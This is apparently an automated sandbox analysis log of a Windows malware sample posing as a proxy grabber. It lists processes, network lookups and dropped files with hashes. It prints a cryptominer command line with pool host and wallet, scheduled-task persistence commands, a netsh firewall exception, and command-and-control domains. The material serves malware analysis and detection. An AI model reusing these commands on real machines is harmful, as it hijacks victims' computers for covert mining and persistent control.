C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {734AD315-4209-4015-A1BF-8A6AB4AD31E7} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp

Files

memory/1828-54-0x0000000075741000-0x0000000075743000-memory.dmp

\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

memory/1396-59-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

memory/932-68-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1692-75-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

C:\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

memory/1820-81-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1632-89-0x0000000000080000-0x00000000000CC000-memory.dmp

memory/1632-91-0x0000000000080000-0x00000000000CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

memory/1548-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

C:\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

memory/1632-105-0x000000000008BBCC-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1632-107-0x0000000000080000-0x00000000000CC000-memory.dmp

\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

memory/592-112-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

memory/1560-116-0x0000000000090000-0x000000000009C000-memory.dmp

memory/1632-115-0x0000000000080000-0x00000000000CC000-memory.dmp

memory/1560-118-0x0000000000090000-0x000000000009C000-memory.dmp

memory/1560-122-0x000000000009823E-mapping.dmp

memory/1560-123-0x0000000000090000-0x000000000009C000-memory.dmp

memory/1560-124-0x0000000000090000-0x000000000009C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1896-129-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1820-132-0x00000000001A0000-0x0000000000830000-memory.dmp

memory/1340-135-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1340-139-0x000000000040823E-mapping.dmp

memory/1340-140-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1340-141-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1632-142-0x0000000010410000-0x0000000010471000-memory.dmp

memory/1896-145-0x0000000010410000-0x0000000010471000-memory.dmp

memory/1896-147-0x0000000010410000-0x0000000010471000-memory.dmp

memory/592-148-0x00000000003D0000-0x0000000000486000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XX--XX--XX.txt

MD5 06c726690de1e0bf2ee467d6da373c60
SHA1 f98af670a712cfc223c444d6beb0803642054260
SHA256 d884fb142b4dd02afc9e7a903cd5ef618d39525b31ff35edbaa79a4e768738fc
SHA512 90716d4b014333d9eefb86576d29c5ee45aaa7e20cc3266e82860c084d8fda17611d08b05ccc23f0e16affe73ab6dd209a446cfa805fbb3c5ecf95fe7b5f418e

\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1740-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1560-155-0x00000000733E0000-0x000000007398B000-memory.dmp

memory/1896-156-0x0000000010410000-0x0000000010471000-memory.dmp

memory/592-157-0x0000000000490000-0x00000000004EA000-memory.dmp

memory/1128-158-0x0000000000000000-mapping.dmp

memory/1720-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

MD5 222f649af364623037bda8ee9df02945
SHA1 f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA256 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512 c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64

memory/956-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

MD5 222f649af364623037bda8ee9df02945
SHA1 f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA256 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512 c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64

\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

MD5 222f649af364623037bda8ee9df02945
SHA1 f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA256 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512 c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64

memory/936-165-0x0000000000000000-mapping.dmp

memory/1388-166-0x0000000000000000-mapping.dmp

memory/1696-167-0x0000000000000000-mapping.dmp

memory/592-168-0x0000000000385000-0x0000000000396000-memory.dmp

memory/932-171-0x0000000000400000-0x000000000040C000-memory.dmp

memory/932-176-0x000000000040748E-mapping.dmp

memory/932-177-0x0000000000400000-0x000000000040C000-memory.dmp

memory/932-178-0x0000000000400000-0x000000000040C000-memory.dmp

memory/932-180-0x00000000733E0000-0x000000007398B000-memory.dmp

memory/972-181-0x0000000000000000-mapping.dmp

memory/1460-183-0x0000000000000000-mapping.dmp

memory/572-187-0x0000000000000000-mapping.dmp

memory/880-186-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

MD5 dfd75a7bf3505b1451149b8d73a359ae
SHA1 8db9aa88468ce61ffa43eaa195aff0eb359310b6
SHA256 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
